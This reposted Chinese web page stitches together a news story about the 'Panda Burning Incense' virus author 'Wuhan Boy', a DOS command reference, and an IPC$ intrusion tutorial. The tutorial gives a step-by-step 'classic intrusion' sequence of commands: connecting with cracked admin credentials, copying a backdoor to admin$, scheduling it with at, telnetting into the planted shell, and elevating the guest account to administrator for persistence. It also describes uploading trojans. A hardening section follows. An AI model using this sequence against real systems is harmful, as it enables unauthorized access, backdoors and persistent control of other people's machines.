在这些变种中,每隔一段时间,作者都有意在病毒中留下whboy字样。“他主要给我们这些分析病毒的人看,普通用户看不到代码。”
随着变种增多,反病毒人士在连续解剖病毒的同时,开始期待更多留言出现。
病毒内部列出“鸣谢单位”
2006年12月初,“熊猫烧香”变种加速,代码中除了whboy字样外,又多了一行汉字:“武汉男孩感染下载者。”随着变种的增多,代码内附带的信息也越来越多。
此时,mopery和艾玛已经加入抗击“熊猫烧香”的大军当中。他们分析熊猫的新变种,并在卡卡社区反病毒论坛上,贴出一份份详细的病毒分析报告。
他们的举动,吸引了病毒作者“武汉男孩”的注意力。在1月初一份病毒变种中,神秘留言再次更新。
“感谢mopery对此木马的关注。”留言中新添的这句话,让mopery啼笑皆非。随后,武汉男孩似乎迷恋上了这种病毒内部列出“鸣谢单位”的模式,在1月5日的病毒留言中,感谢名单上添加了艾玛的名字。1月9日,感谢名单中又多了杀毒高手“海色之月”的名字,文末还添加了一句“服了……艾玛…… ”
此后,武汉男孩开始频繁用这种方式与对手“交流”。
1月15日,武汉男孩还在留言中和反毒者taylor77打起了招呼:“taylor77,不知道找我啥事啊?”并且戏言:“我制作的病毒已经‘满城尽烧国宝香’。”
网络世界高手对决一个月
1月16日,武汉男孩发布了新的病毒变种,反毒者们习惯称之为“艾玛”版本。因为在这个病毒内部的留言中,写了22次艾玛的名字。
1月19日晚,“熊猫烧香”发布了最后一次更新。这个版本可称为传染手段最全面的版本。
在“熊猫烧香”的最后一个版本中,武汉男孩写下了临别赠语:“在此对各位中过此木马的网友和各位网管人员表示深深的歉意!对不起,你们辛苦了!mopery,很想和你们交流下!某某原因,我想还是算了!”
面对“熊猫烧香”停止更新的消息,反病毒工程师史瑀显得很平静:“我们希望熊猫风波就此结束,但是武汉男孩有失言的先例。总之他只要更新,我们就奉陪到底。”
对于持续对决一个多月,却不知藏身何处的武汉男孩,mopery的赠言是:“我希望他能好好利用自己的技术来服务广大网民,而不是给网民带来痛苦。”
“武汉男孩”身份存仨版本
虽然武汉男孩表示不再更新“熊猫烧香”,但这场席卷全国的病毒狂潮却余波难平。网民们纷纷猜测武汉男孩的真实身份。
经调查,目前在业内人士中,关于武汉男孩的身份有三种猜测。其一,武汉男孩是一名15岁的武汉少年,证据是网络上流传的他和反毒者农夫的QQ对话。其二,武汉男孩是桂林一家软件公司的副总裁,曾编写过流氓软件,消息来源是反病毒论坛。其三,武汉男孩是国内杀毒软件公司的员工,故意编写病毒,促销相应的杀毒产品。
为核证传言,记者分别采访了mopery和瑞星公司反病毒工程师史瑀。
mopery称,经过他和农夫的核证,证实流传的QQ聊天片断的主人公,是另外一种病毒的作者,而非武汉男孩。至于公司副总的说法,属空穴来风。
作为杀毒软件公司的员工,史瑀说,每次大型病毒流传后,总有各种对杀毒软件公司不利的传言,但杀毒软件界的程序员不会编写病毒、扰乱网络。他反问道:“流感病毒是医生制作的么?”
mopery和史瑀都表示,从留言的内容和程序代码来看,武汉男孩是一位有丰富病毒编写经验的熟手,经常浏览卡卡社区反病毒论坛,随时关注mopery等人的病毒分析。卡卡社区有59万余名会员,武汉男孩一定身在其中,但这个范围却再难缩小。“武汉男孩本身精通网络技术和入侵技术,通过他上网的痕迹追查真身很难实现。”mopery说。
“熊猫烧香”带有商业目的
史瑀说,他们经过分析认为,“熊猫烧香”带有强烈的商业目的,“用户感染病毒后,会从后台点击国外的网站,部分变种中含有盗号木马,病毒作者可借此牟利。”
“现在的病毒作者和上世纪90年代的不同,他们不再以炫耀技术为目的,而是带有明确商业目的,病毒和流氓软件界限越来越模糊了。”史瑀说。
昨天下午,瑞星公司工作人员表示,已将病毒作者的相关证据和病毒特性提交给国家计算机病毒应急处理中心。国家计算机病毒应急处理中心工作人员称,关于这场“熊猫烧香”病毒风暴,受波及的电脑数字以及造成的经济损失等相关数据,目前正在统计,将于近日在其主页上公布。
关于是否向公安机关报案,这名工作人员表示,目前不便透露。
“我相信总有一天会见到武汉男孩真面目的。”mopery说

DOS 常用命令&IPC$命令详解
DOS 常用命令:
dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录
copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘
edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录名
more 分屏显示 type 显示文件内容 rd 删除目录 sys 制作DOS系统盘
ren 改变文件名 xcopy 拷贝目录与文件 chkdsk 检查磁盘 attrib 设置文件属性
fdisk 硬盘分区 date 显示及修改号期 label 设置卷标号 defrag 磁盘碎片整理
msd 系统检测 path 设置搜寻目录 share 文件共享 memmaker内存优化管理
help 帮助 restore 恢复备份文件 set 设置环境变量 time 显示及修改时间
tree 列目录树 debug 随机调试程序 doskey 重新调用DOS命令 prempt 设置提示符 undelete恢复被删的文件 scandisk检测、修理磁盘

不常用DOS命令
diskcomp磁盘比较 append 设置非执行文件路径
expand 还原DOS文件 fasthelp快速显示帮助信息
fc 文件比较 interink启动服务器
setver 设置版本 intersvr启动客户机
subst 路径替换 qbasic Basic集成环境
vsafe 防病毒 unformat恢复已格式化的磁盘
ver 显示DOS版本号 smartdrv设置磁盘加速
vol 显示磁盘卷标号 lh 将程序装入高端内存
ctty 改变控制设备 emm386 扩展内存管理
常用命令具体介绍:
一、Dir
显示目录文件和子目录列表,呵呵,这个当然是人人要知道的。
可以使用通配符( 和 ),?表通配一个字符,表通配任意字符
后缀
指定要查看后缀的文件。 上面其实也可以为“ 后缀”,例如dir exe 等于dir exe
/p
每次显示一个列表屏幕。要查看下一屏,请按键盘上的任意键。
/w
以宽格式显示列表,在每一行上最多显示 5 个文件名或目录名。
/s
列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了
dir -> atxt 把当前目录文件列表写入atxt
dir /s -> atxt 把当前目录文件列表写入atxt,包括子目录下文件。
二、Attrib
显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用,则 attrib 会显示当前目录中所有文件的属性。
+r
设置只读属性。
-r
清除只读属性。
+a
设置存档文件属性。
-a
清除存档文件属性。
+s
设置系统属性。
-s
清除系统属性。
+h
设置隐藏属性。
-h
清除隐藏属性。
三、Cls
清除显示在命令提示符窗口中的所有信息,并返回空窗口,即“清屏”
四、Exit
退出当前命令解释程序并返回到系统。
五、format
格式化
/q
执行快速格式化。删除以前已格式化卷的文件表和根目录,但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。
六、Ipconfig
显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。
/all
显示所有适配器的完整 TCP/IP 配置信息。
ipconfig 等价于 winipcfg,后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面,但可以使用“网络连接”查看和更新 IP 地址。要做到这一点,请打开 网络连接,右键单击某一网络连接,单击“状态”,然后单击“支持”选项卡。
该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。
七、md
创建目录或子目录
八、Move
将一个或多个文件从一个目录移动到指定的目录。
九、Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 N
etBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。
十、Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
十一、Ping
通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数,ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。
-t
指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息,请按 CTRL-BREAK。要中断并退出 ping,请按 CTRL-C。
-lSize
指定发送的回响请求消息中“数据”字段的长度(以字节表示)。默认值为 32。size 的最大值是 65,527。
十二、Rename (Ren)
更改文件的名称。
例如 ren abc cba
十三、Set
显示、设置或删除环境变量。如果没有任何参数,set 命令将显示当前环境设置。
十四、Shutdown
允许您关闭或重新启动本地或远程计算机。如果没有使用参数,shutdown 将注销当前用户。
-m ComputerName
指定要关闭的计算机。
-t xx
将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。
-l
注销当前用户,这是默认设置。-m ComputerName 优先。
-s
关闭本地计算机。
-r
关闭之后重新启动。
-a
中止关闭。除了 -l 和 ComputerName 外,系统将忽略其它参数。在超时期间,您只可以使用 -a。
十五、System File Checker (sfc)
win下才有,在重新启动计算机后扫描和验
证所有受保护的系统文件。
/scannow
立即扫描所有受保护的系统文件。
/scanonce
一次扫描所有受保护的系统文件。
/purgecache
立即清除“Windows 文件保护”文件高速缓存,并扫描所有受保护的系统文件。
/cachesize=x
设置“Windows 文件保护”文件高速缓存的大小,以 MB 为单位。
十六、type
显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件
十七、Tree
图像化显示路径或驱动器中磁盘的目录结构。
十八、Xcopy
复制文件和目录,包括子目录。
/s
复制非空的目录和子目录。如果省略 /s,xcopy 将在一个目录中工作。
/e
复制所有子目录,包括空目录。
十九、copy
将一个或多个文件从一个位置复制到其他位置
二十、del
删除指定文件。
ftp和bat批命令和net和telnet由于子命令太多,这里不说了,不过这几个都是常用到的。
IPC$命令详解:
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少)
因此我写了这篇相当于解惑的教程想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!
二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的
解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表
三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有
一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制怎么样够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在
四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟)
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就大家自己体会和试验了
<br>六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
七 如何防范ipc$入侵
1禁止空连接进行枚举(此作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
4)删除一个ipc$连接
net&nbs
p;use \\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use /del 删除全部,会有提示要求按y确认
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
11 C:\>net use \\127001\IPC$ "密码" /user:"用户名"
一般用流光,通过扫描弱口令来得到,管理员帐号和密码
2 C:\>copy srvexe \\127001\admin$
先复制srvexe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3 C:\>net time \\127001
查查时间,发现127001 的当前时间是 2004/6/15 上午 11:00,命令成功完成。

4 C:\>at \\127001 11:05 srvexe
用at命令启动srvexe吧
5 C:\>net time \\127001
再查查到时间没有?如果127001 的当前时间是 2004/6/15 上午 11:05,那就准备开始下面的命令。

6 C:\>telnet 127001 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7C:\>copy ntlmexe \\127001\admin$
用Copy命令把ntlmexe上传到主机上(ntlmexe也是在《流光》的Tools目录中)。

8 C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9 Telnet 127001,接着输入用户名与密码就进入对方了,作就像在DOS上作一样简单!(然后你想做什么想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10 C:\>net user guest /active:yes
将对方的Guest用户激活
11 C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12 C:\>net localgroup administrators guest /add
将Guest变为Administrator(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
ipc$常见问题:
1,怎样建立空连接,它有什么用?
答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。
2为什么我连不上IPC$?
答:1只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2确认你的命令没有打错。正确的命令是: net use \目标IPipc$ "密码" /user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。
5,怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
6,怎样映射和访问默认共享?
答:使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy mumaexe \IPd$pathmumaexe 。或者再映射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后 copy mumaexe y:pathmumaexe 。当路径中包含空格时,须用""将路径全引住。
7,如何删除映射和ipc$连接?
答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /
del 删除映射的z盘,其他盘类推。
用命令 net use /del 删除全部。会有提示要求按y确认。
8,连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
9,怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止别人空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000002。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。
(完)
这是我苦苦收集的啊~~~~~~~~~~~~~~~

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zz/10341793.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
无崖子 无崖子 一级用户组
0 0
上一篇 2023-05-07
下一篇 2023-05-07

发表评论

登录后才能评论

评论列表(0条)

保存